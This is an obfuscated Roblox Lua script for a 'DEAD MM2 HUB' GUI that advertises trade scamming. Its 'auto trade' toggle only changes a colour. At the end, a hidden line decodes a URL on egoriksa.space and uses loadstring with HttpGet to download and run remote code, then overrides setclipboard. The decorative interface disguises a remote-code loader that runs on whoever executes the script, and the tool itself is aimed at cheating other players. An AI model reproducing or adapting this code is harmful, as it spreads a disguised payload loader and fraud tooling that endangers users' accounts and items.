function bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh(code)res=''for i in ipairs(code)do res=res..string.char(code[i]/105)end return res end 


-- Create the main GUI
local ScreenGui = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8715,10395,11970,10605,10605,11550,7455,12285,11025}))
local MainFrame = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({7350,11970,10185,11445,10605}))
local Sidebar = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({7350,11970,10185,11445,10605}))
local TitleLabel = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8820,10605,12600,12180,7980,10185,10290,10605,11340}))
local TradeScamText = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8820,10605,12600,12180,7980,10185,10290,10605,11340}))
local AutoTradeButton = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8820,10605,12600,12180,6930,12285,12180,12180,11655,11550}))
local CircleIndicator = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({7350,11970,10185,11445,10605}))
local CloseButton = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8820,10605,12600,12180,6930,12285,12180,12180,11655,11550}))
local UICorner = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8925,7665,7035,11655,11970,11550,10605,11970}))
local UIStroke = Instance.new(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8925,7665,8715,12180,11970,11655,11235,10605}))
local Filled = false -- Indicator for button click

-- GUI properties
ScreenGui.Parent = game.CoreGui

MainFrame.Parent = ScreenGui
MainFrame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) -- Main Frame is now black
MainFrame.Position = UDim2.new(0.5, -200, 0.5, -100)
MainFrame.Size = UDim2.new(0, 400, 0, 150)
MainFrame.BorderSizePixel = 0

UICorner.CornerRadius = UDim.new(0, 12)
UICorner.Parent = MainFrame

-- Sidebar for the GUI
Sidebar.Parent = MainFrame
Sidebar.BackgroundColor3 = Color3.fromRGB(0, 0, 0) -- Sidebar is also black
Sidebar.Size = UDim2.new(0.25, 0, 1, 0)
Sidebar.Position = UDim2.new(0, 0, 0, 0)

UICorner.CornerRadius = UDim.new(0, 12)
UICorner.Parent = Sidebar

TitleLabel.Parent = Sidebar
TitleLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TitleLabel.BackgroundTransparency = 1
TitleLabel.Size = UDim2.new(1, 0, 0.3, 0)
TitleLabel.Position = UDim2.new(0, 0, 0, 10)
TitleLabel.Font = Enum.Font.SourceSansBold
TitleLabel.Text = bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({7140,7245,6825,7140,3360,8085,8085,5250,3360,7560,8925,6930})
TitleLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TitleLabel.TextScaled = true

-- Close button
CloseButton.Parent = MainFrame
CloseButton.BackgroundColor3 = Color3.fromRGB(0, 0, 0) -- Transparent background for the close button
CloseButton.BackgroundTransparency = 1 -- Set transparency to fully transparent
CloseButton.Position = UDim2.new(1, -35, 0, 5)
CloseButton.Size = UDim2.new(0, 30, 0, 30)
CloseButton.Font = Enum.Font.SourceSansBold
CloseButton.Text = bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({9240})
CloseButton.TextColor3 = Color3.fromRGB(255, 255, 255) -- White bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({9240}) text
CloseButton.TextScaled = true
CloseButton.BorderSizePixel = 0

-- Trade Scam Text Label
TradeScamText.Parent = MainFrame
TradeScamText.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TradeScamText.BackgroundTransparency = 1
TradeScamText.Size = UDim2.new(0.5, 0, 0.2, 0)
TradeScamText.Position = UDim2.new(0.3, 0, 0.2, 0)
TradeScamText.Font = Enum.Font.SourceSansBold
TradeScamText.Text = bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({12180,11970,10185,10500,10605,3360,12075,10395,10185,11445})
TradeScamText.TextColor3 = Color3.fromRGB(255, 255, 255)
TradeScamText.TextScaled = true
TradeScamText.TextXAlignment = Enum.TextXAlignment.Left

-- Combined Auto Trade Button with Circle
AutoTradeButton.Parent = MainFrame
AutoTradeButton.BackgroundColor3 = Color3.fromRGB(64, 64, 64) -- Darker grey button
AutoTradeButton.Position = UDim2.new(0.3, 0, 0.5, 0)
AutoTradeButton.Size = UDim2.new(0.5, 0, 0.2, 0)
AutoTradeButton.Font = Enum.Font.SourceSansBold
AutoTradeButton.Text = bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({10185,12285,12180,11655,3360,12180,11970,10185,10500,10605})
AutoTradeButton.TextColor3 = Color3.fromRGB(192, 192, 192) -- Darker grey text above the circle
AutoTradeButton.TextScaled = true
AutoTradeButton.TextYAlignment = Enum.TextYAlignment.Top
AutoTradeButton.BorderSizePixel = 0

-- Circle Indicator inside Auto Trade Button
CircleIndicator.Parent = AutoTradeButton
CircleIndicator.BackgroundColor3 = Color3.fromRGB(128, 128, 128) -- Grey indicator
CircleIndicator.Position = UDim2.new(0, 0, 1, -30) -- Positioned below the text inside the button
CircleIndicator.Size = UDim2.new(0, 20, 0, 20)
CircleIndicator.BorderSizePixel = 0

UICorner.CornerRadius = UDim.new(1, 0)
UICorner.Parent = CircleIndicator

UIStroke.Parent = CircleIndicator
UIStroke.Color = Color3.fromRGB(255, 255, 255)
UIStroke.Thickness = 1

-- Draggable GUI
local dragging
local dragInput
local dragStart
local startPos

local function update(input)
	local delta = input.Position - dragStart
	MainFrame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
end

MainFrame.InputBegan:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseButton1 then
		dragging = true
		dragStart = input.Position
		startPos = MainFrame.Position
		
		input.Changed:Connect(function()
			if input.UserInputState == Enum.UserInputState.End then
				dragging = false
			end
		end)
	end
end)

MainFrame.InputChanged:Connect(function(input)
	if input.UserInputType == Enum.UserInputType.MouseMovement then
		dragInput = input
	end
end)

game:GetService(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({8925,12075,10605,11970,7665,11550,11760,12285,12180,8715,10605,11970,12390,11025,10395,10605})).InputChanged:Connect(function(input)
	if input == dragInput and dragging then
		update(input)
	end
end)

-- Close button functionality
CloseButton.MouseButton1Click:Connect(function()
	ScreenGui:Destroy()
end)

-- Combined Button Click Functionality
AutoTradeButton.MouseButton1Click:Connect(function()
	Filled = not Filled
	if Filled then
		CircleIndicator.BackgroundColor3 = Color3.fromRGB(255, 255, 255) -- Filled color (white)
	else
		CircleIndicator.BackgroundColor3 = Color3.fromRGB(128, 128, 128) -- Default grey color
	end
end)

getgenv().gui = false
loadstring(game:HttpGet(bydeyAgdCLeNnMBiREvUvyMzFAFgTHDHwmDGh({10920,12180,12180,11760,12075,6090,4935,4935,10605,10815,11655,11970,11025,11235,12285,12075,10185,4830,12075,11760,10185,10395,10605,4935,5145,5250,5775,5355,10395,10605,5880,5670,10290,5355,10185,5145,10290,10500,5250,5145,10290,5775,5670,10395,5355,10605,5985,10185,4830,11340,12285,10185}), true))()    
setclipboard = nil
setclipboard = function() end
